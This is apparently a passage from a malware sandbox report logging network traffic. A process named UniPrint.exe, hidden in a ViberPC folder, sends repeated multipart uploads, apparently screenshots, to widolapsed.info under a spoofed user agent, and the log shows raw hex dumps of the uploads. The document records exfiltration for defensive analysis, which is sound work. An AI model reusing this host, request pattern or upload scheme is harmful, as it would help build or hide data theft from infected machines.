                                                                                                      2021-09-15 11:46:33 UTC2332OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 98 d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:46:33 UTC2332OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:33 UTC2348OUTData Raw: 12 dc f5 e2 c9 14 d7 8c 6b df f2 30 6a 5f f5 f5 2f fe 86 6b d9 94 d7 8c eb df f2 30 6a 5f f5 f5 2f fe 86 6b d0 cb 3e 29 1c b8 bd 91 42 96 92 96 bd 93 88 28 c5 14 50 20 c5 7a 7f c2 9e 34 9b ef fa ee 3f f4 1a f3 0a f4 ef 85 5f f2 09 be ff 00 ae e3 ff 00 41 ac ea fc 26 94 fe 23 ba a4 ac 9b 1b 58 1f 49 b6 b9 b9 9e eb 2d 02 c9 23 9b b9 40 fb a0 93 f7 aa ca 58 5a c9 1a bc 73 5d 32 b0 c8 22 f2 5c 11 ff 00 7d 56 2e 31 4f 7f c3 fe 09 a2 94 9a db f1 ff 00 80 54 d5 20 b5 bb 4b ab 4b d8 24 92 39 58 1e 22 66 fe 15 19 04 0e bc 57 90 eb fa 5f f6 46 a8 f6 a1 cb a6 37 21 65 2a 70 7d 41 ef 5e c9 2d b2 da de 58 98 64 b8 f9 e6 2a c1 ee 1d c1 1e 5b 9e 84 91 d4 0a f3 5f 89 1f f2 35 bf fd 71 4f e5 57 05 67 a7 52 66 ee b5 e8 72 74 94 ec 0a 4c 56 d6 32 12 8a 5c 51 83 40 07 7a 28
                                                                                                      Data Ascii: k0j_/k0j_/k>)B(P z4?_A&#XI-#@XZs]2"\}V.1OT KK$9X"fW_F7!e*p}A^-Xd*[_5qOWgRfrtLV2\Q@z(
                                                                                                      2021-09-15 11:46:33 UTC2364OUTData Raw: 02 8a 28 a0 42 d1 49 4b 48 02 8a 28 a0 41 4b 49 4b 48 02 96 92 94 50 21 45 2d 25 2d 21 0b 56 20 6e 82 ab 54 d6 ff 00 7a a2 5b 1a 52 76 91 af ab 1c 78 68 7b b5 71 2f d6 bb 3d 67 8f 0d 27 fb d5 c5 b9 e6 b1 c2 fc 0f d4 f5 2b fc 6b d0 ef 47 1e 1d b2 fa 0a a3 9a ba dc 78 7e c4 7f b2 3f 95 51 ae 7a 3d 7d 4d 31 0f de 5e 82 e6 8c d2 52 56 c7 3d c7 66 94 35 34 51 45 81 31 f9 34 ed c7 d6 98 29 6a 5a 2d 36 48 18 d3 83 1a 88 53 b3 52 d1 4a 4c 94 39 f5 a7 09 98 74 63 50 83 4b 52 e2 8b 53 65 a5 b9 90 7f 11 a9 56 f1 c7 5c 1a a4 0d 3b 35 0e 9c 4d 15 59 17 c5 e7 f7 94 1a 5f 3e 16 fb d1 8a a1 9a 50 c6 a5 d2 45 aa ac bd b6 d1 fa a6 29 3e c7 68 dd 0e 2a a8 63 4e 0c 6a 79 5a d9 94 a7 17 ba 25 3a 64 67 ee bd 31 b4 b6 fe 17 06 80 e7 b1 35 20 99 c7 f1 1a 2f 35 d4 39 69 be 85 76
                                                                                                      Data Ascii: (BIKH(AKIKHP!E-%-!V nTz[Rvxh{q/=g'+kGx~?Qz=}M1^RV=f54QE14)jZ-6HSRJL9tcPKRSeV\;5MY_>PE)>h*cNjyZ%:dg15 /59iv
                                                                                                      2021-09-15 11:46:33 UTC2380OUTData Raw: 44 7f de 7a 5e df b2 65 2c 33 ea d2 32 71 4f 11 b9 e0 29 3f 85 68 9d 4b 4f 8f fd 5d a9 3f 5a 43 ae 05 ff 00 55 6b 18 fa d1 ed 2a 3d a2 1e c2 9a de 45 45 b4 9d ba 46 7f 2a b7 69 a6 dc 79 a1 8a 1e b5 1b 6b b7 47 ee 84 5f a0 a6 26 ab 78 f2 2e 65 38 27 b0 a9 92 ac d1 a5 35 42 32 5b b2 e7 8c d7 6c 36 a0 fa 57 2f a7 ff 00 c8 46 df fe ba 2d 74 de 31 25 ad ad 09 ea 56 b9 9d 3f fe 42 36 ff 00 f5 d0 7f 3a 58 7f e0 1d 75 bf 8c 7a 16 a2 96 e6 60 d3 4a 14 e3 a5 52 33 69 b1 f5 72 6a b7 89 09 17 ab 83 fc 35 8b d7 bd 61 42 87 34 13 6c 9c 4e 33 92 a3 8a 89 d0 1d 4f 4f 4f b9 11 34 c3 ae 44 bf ea ed c5 61 51 5b ac 2c 3a 9c 8f 1f 57 a1 b0 da fc df c1 1a 8a 81 f5 9b b6 e8 d8 fa 56 75 15 4b 0f 4d 74 32 78 ba cf a9 6d b5 0b 97 fb d2 b7 e7 4d f3 a4 6e ae 4f e3 55 e9 cb 57 ec e2
                                                                                                      Data Ascii: Dz^e,32qO)?hKO]?ZCUk*=EEF*iykG_&x.e8'5B2[l6W/F-t1%V?B6:Xuz`JR3irj5aB4lN3OOO4DaQ[,:WVuKMt2xmMnOUW
                                                                                                      2021-09-15 11:46:33 UTC2396OUTData Raw: 28 a0 05 a2 92 8a 00 5a 5a 6d 2d 02 16 92 8a 28 01 73 45 25 14 00 b4 52 51 40 0b 45 14 50 02 d1 49 4b 4c 41 4b 49 45 30 0a 28 a2 90 05 14 51 40 05 14 51 40 05 2d 25 14 00 b4 52 52 d3 00 a2 8a 28 10 b4 52 51 40 0b 45 25 14 00 b4 52 51 40 0b 45 14 50 01 45 14 53 10 b4 94 51 40 0b 45 14 50 01 45 14 50 01 45 14 50 02 d1 48 29 69 88 29 69 28 cd 00 2d 14 99 a2 80 16 8c d2 51 40 0b 9a 29 29 68 10 51 45 14 00 52 d2 52 d3 00 a5 a4 a2 80 17 bd 14 51 40 05 14 94 b4 c0 5a 29 28 a0 42 d1 49 4b 40 0b 45 25 14 c4 2d 14 51 40 0b 49 46 68 a0 05 a2 8a 28 00 a5 a4 a2 80 16 81 49 4b 4c 42 d1 9a 4a 29 88 5c d1 9a 4a 28 01 d9 a2 9b 4b 45 c2 c2 d1 9a 4c d2 66 8b 85 87 66 8c d3 73 45 17 0b 0f cd 19 a6 d1 9a 77 15 87 66 93 34 da 5c d2 b8 ec 2e 69 73 4d a4 cd 17 0b 0e a3 34 99 a2
                                                                                                      Data Ascii: (ZZm-(sE%RQ@EPIKLAKIE0(Q@Q@-%RR(RQ@E%RQ@EPESQ@EPEPEPH)i)i(-Q@))hQERRQ@Z)(BIK@E%-Q@IFh(IKLBJ)\J(KELffsEwf4\.isM4
                                                                                                      2021-09-15 11:46:33 UTC2407OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 30 30 32 38 36 34 31 33 39 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------1002864139--
                                                                                                      2021-09-15 11:46:34 UTC2407INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:33 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=77aa39f3e0133f49e7d84991513818e466532f67e1ab03ff26869534719b41d5; expires=Thu, 15-Sep-2022 11:46:34 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:34 UTC2407INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      31192.168.2.34982245.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:35 UTC2407OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76582
                                                                                                      Content-Type: multipart/form-data; boundary=--------795614568
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:35 UTC2408OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 37 39 35 36 31 34 35 36 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------795614568Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:35 UTC2408OUTData Raw: 7f 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 ea d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee 98 ef 4d 77 7d 78 7d 40 d3 6d 60 3b ea 5f 32 bb b0
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[DMw}x}@m`;_2
                                                                                                      2021-09-15 11:46:35 UTC2408OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:35 UTC2424OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:46:35 UTC2440OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:46:35 UTC2456OUTData Raw: b5 27 eb 48 75 c0 bf ea ad 63 1f 5a 3d a5 47 b4 43 d8 53 5b c8 a8 b6 93 b7 48 cf e5 56 ed 34 db 8f 34 31 43 d6 a3 6d 76 e8 fd d0 8b f4 14 c4 d5 6f 1e 45 cc a7 04 f6 15 32 55 9a 34 a6 a8 46 4b 76 5c f1 9a ed 86 d4 1f 4a e5 f4 ff 00 f9 08 db ff 00 d7 45 ae 9b c6 24 b5 b5 a1 3d 4a d7 33 a7 ff 00 c8 46 df fe ba 0f e7 4b 0f fc 03 ae b7 f1 8f 42 d4 52 dc cc 1a 69 42 9c 74 aa 46 6d 36 3e ae 4d 56 f1 21 22 f5 70 7f 86 b1 7a f7 ac 28 50 e6 82 6d 93 89 c6 72 54 71 51 3a 03 a9 e9 e9 f7 22 26 98 75 c8 97 fd 5d b8 ac 2a 2b 75 85 87 53 91 e3 ea f4 36 1b 5f 9b f8 23 51 50 3e b3 76 dd 1b 1f 4a ce a2 a9 61 e9 ae 86 4f 17 59 f5 2d b6 a1 72 ff 00 7a 56 fc e9 be 74 8d d5 c9 fc 6a bd 39 6a fd 9c 56 c8 95 5a 6f 76 4b b8 9e a4 d2 e6 9a 29 69 58 b5 26 c7 53 85 37 34 b9 a4 5a 63
                                                                                                      Data Ascii: 'HucZ=GCS[HV441CmvoE2U4FKv\JE$=J3FKBRiBtFm6>MV!"pz(PmrTqQ:"&u]*+uS6_#QP>vJaOY-rzVtj9jVZovK)iX&S74Zc
                                                                                                      2021-09-15 11:46:35 UTC2472OUTData Raw: 4b 4d a5 a0 42 d2 51 45 00 2e 68 a4 a2 80 16 8a 4a 28 01 68 a2 8a 00 5a 29 29 69 88 29 69 28 a6 01 45 14 52 00 a2 8a 28 00 a2 8a 28 00 a5 a4 a2 80 16 8a 4a 5a 60 14 51 45 02 16 8a 4a 28 01 68 a4 a2 80 16 8a 4a 28 01 68 a2 8a 00 28 a2 8a 62 16 92 8a 28 01 68 a2 8a 00 28 a2 8a 00 28 a2 8a 00 5a 29 05 2d 31 05 2d 25 19 a0 05 a2 93 34 50 02 d1 9a 4a 28 01 73 45 25 2d 02 0a 28 a2 80 0a 5a 4a 5a 60 14 b4 94 50 02 f7 a2 8a 28 00 a2 92 96 98 0b 45 25 14 08 5a 29 29 68 01 68 a4 a2 98 85 a2 8a 28 01 69 28 cd 14 00 b4 51 45 00 14 b4 94 50 02 d0 29 29 69 88 5a 33 49 45 31 0b 9a 33 49 45 00 3b 34 53 69 68 b8 58 5a 33 49 9a 4c d1 70 b0 ec d1 9a 6e 68 a2 e1 61 f9 a3 34 da 33 4e e2 b0 ec d2 66 9b 4b 9a 57 1d 85 cd 2e 69 b4 99 a2 e1 61 d4 66 93 34 51 70 b0 ec d2 1a 4a 33
                                                                                                      Data Ascii: KMBQE.hJ(hZ))i)i(ER((JZ`QEJ(hJ(h(b(h((Z)-1-%4PJ(sE%-(ZJZ`P(E%Z))hh(i(QEP))iZ3IE13IE;4SihXZ3ILpnha43NfKW.iaf4QpJ3
                                                                                                      2021-09-15 11:46:35 UTC2482OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 37 39 35 36 31 34 35 36 38 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------795614568--
                                                                                                      2021-09-15 11:46:35 UTC2482INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:35 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=72d2c764d55caf667dfeff3581d5b1fa729c64d8bcdddda5db7f4f99dd5879f8; expires=Thu, 15-Sep-2022 11:46:35 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:35 UTC2483INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      32192.168.2.34982345.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:36 UTC2483OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76736
                                                                                                      Content-Type: multipart/form-data; boundary=--------572333967
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:36 UTC2483OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 35 37 32 33 33 33 39 36 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------572333967Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:36 UTC2483OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 7e d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe~0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:46:36 UTC2483OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:36 UTC2499OUTData Raw: 57 7f a6 5d 8d 47 4b 86 e5 90 0f 35 3e 65 ed 9e 86 b9 6a 54 c4 50 b4 a6 ee 8e aa 74 f0 f5 ef 18 2b 33 ca 2b 3f 59 ff 00 8f 44 ff 00 ae 83 f9 1a e8 bc 43 60 34 ed 62 68 10 62 33 f3 a7 d0 f6 fe 62 b9 dd 67 fe 3d 13 fe ba 0f e4 6b b2 a4 94 a9 39 2e a8 e3 a7 17 1a ca 2f a3 31 68 a2 8a f3 0f 54 28 a2 92 80 3d ea 58 03 fc c9 c3 7f 3a 80 64 1c 1e a2 ae 1a a6 c7 f7 af fe f1 af 97 a8 96 e7 af 16 48 a6 bc 63 5e ff 00 91 83 52 ff 00 af a9 7f f4 33 5e cc a6 bc 67 5e ff 00 91 83 52 ff 00 af a9 7f f4 33 5e 86 59 f1 48 e5 c5 ec 8a 14 b4 94 b5 ec 9c 41 46 28 a2 81 06 2b d3 fe 14 f1 a4 df 7f d7 71 ff 00 a0 d7 98 57 a7 7c 2a ff 00 90 4d f7 fd 77 1f fa 0d 67 57 e1 34 a7 f1 1d d5 25 64 d8 da c0 fa 4d b5 cd cc f7 59 68 16 49 1c dd ca 07 dd 04 9f bd 56 52 c2 d6 48 d5 e3 9a e9
                                                                                                      Data Ascii: W]GK5>ejTPt+3+?YDC`4bhb3bg=k9./1hT(=X:dHc^R3^g^R3^YHAF(+qW|*MwgW4%dMYhIVRH
                                                                                                      2021-09-15 11:46:36 UTC2515OUTData Raw: 48 13 d6 a9 21 36 26 29 71 4e 02 9d c5 55 88 b8 c0 29 e3 8a 28 a6 4d c2 96 92 96 98 85 14 b4 da 5a 00 29 73 4d a5 34 00 b9 a3 3e 94 da 5c 1a 00 76 69 33 40 14 e0 28 10 80 53 80 a0 0a 75 04 b6 14 94 b8 a3 14 c4 14 b4 94 b4 08 29 cb 4d a5 a0 07 d1 4d a7 0a 64 8b 45 25 2d 02 2c e9 df f1 fd 17 d6 9f 7a 7f d3 65 ff 00 7a 99 a7 7f c7 f4 5f 5a 5b b3 9b a9 3f de ac 3f e5 e9 6f f8 64 54 94 51 5a 98 8b 45 25 2d 00 14 51 45 02 16 8a 4a 5a 40 14 51 45 02 0a 5a 4a 5a 40 14 b4 94 a2 81 0a 29 69 29 69 08 5a b1 03 74 15 5a a6 b7 fb d5 12 d8 d2 93 b4 8d 7d 58 e3 c3 43 dd ab 89 7e b5 d9 eb 3c 78 69 3f de ae 2d cf 35 8e 17 e0 7e a7 a9 5f e3 5e 87 7a 38 f0 ed 97 d0 55 1c d5 d6 e3 c3 f6 23 fd 91 fc aa 8d 73 d1 eb ea 69 88 7e f2 f4 17 34 66 92 92 b6 39 ee 3b 34 a1 a9 a2 8a 2c
                                                                                                      Data Ascii: H!6&)qNU)(MZ)sM4>\vi3@(Su)MMdE%-,zez_Z[??odTQZE%-QEJZ@QEZJZ@)i)iZtZ}XC~<xi?-5~_^z8U#si~4f9;4,
                                                                                                      2021-09-15 11:46:36 UTC2531OUTData Raw: 28 10 52 d1 8a 5c 52 b8 84 a2 9c 14 fa 53 96 27 6e 8a 7f 2a 4e 48 76 6c 65 15 3a da 4e df 76 36 fc aa 74 d3 2e 9b fe 59 1a 87 52 2b a9 4a 94 de c8 a5 45 6a 2e 8d 39 fb c5 57 ea 69 e3 49 8d 79 92 e6 31 f8 d6 6f 11 0e e5 ac 35 47 d0 c9 e2 8c 56 bf d9 34 d8 ff 00 d6 5d 03 f4 a3 cd d2 23 fe f3 d2 f6 fd 93 29 61 9f 56 91 93 8a 78 8d cf 01 49 fc 2b 44 ea 5a 7c 7f ea ed 49 fa d2 1d 70 2f fa ab 58 c7 d6 8f 69 51 ed 10 f6 14 d6 f2 2a 2d a4 ed d2 33 f9 55 bb 4d 36 e3 cd 0c 50 f5 a8 db 5d ba 3f 74 22 fd 05 31 35 5b c7 91 73 29 c1 3d 85 4c 95 66 8d 29 aa 11 92 dd 97 3c 66 bb 61 b5 07 d2 b9 7d 3f fe 42 36 ff 00 f5 d1 6b a6 f1 89 2d 6d 68 4f 52 b5 cc e9 ff 00 f2 11 b7 ff 00 ae 83 f9 d2 c3 ff 00 00 eb ad fc 63 d0 b5 14 b7 33 06 9a 50 a7 1d 2a 91 9b 4d 8f ab 93 55 bc 48
                                                                                                      Data Ascii: (R\RS'n*NHvle:Nv6t.YR+JEj.9WiIy1o5GV4]#)aVxI+DZ|Ip/XiQ*-3UM6P]?t"15[s)=Lf)<fa}?B6k-mhORc3P*MUH
